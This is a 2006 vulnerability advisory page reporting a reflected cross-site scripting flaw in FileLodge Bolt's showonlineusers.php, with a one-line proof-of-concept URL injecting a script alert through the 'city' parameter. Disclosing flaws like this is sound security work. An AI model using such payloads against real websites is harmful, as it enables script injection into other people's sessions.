Computer Security

Security Advisory: FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  RIblog Remote SQL Injection Exploit

  [MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability

  BK Forum <= 4.0 Remote SQL Injection

  XSS Bug in OpenGear Server Website

From:n0m3rcy_(at)_bsdmail.org <n0m3rcy_(at)_bsdmail.org>
Date:24.04.2006
Subject:FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility

# FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:

http://site.com/showonlineusers.php?city=%3Cscript%3Ealert(1);%
3C/script%3E

# Shoutz:
nukedx , cijfer , Devil-00 , str0ke

# Have phun!
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru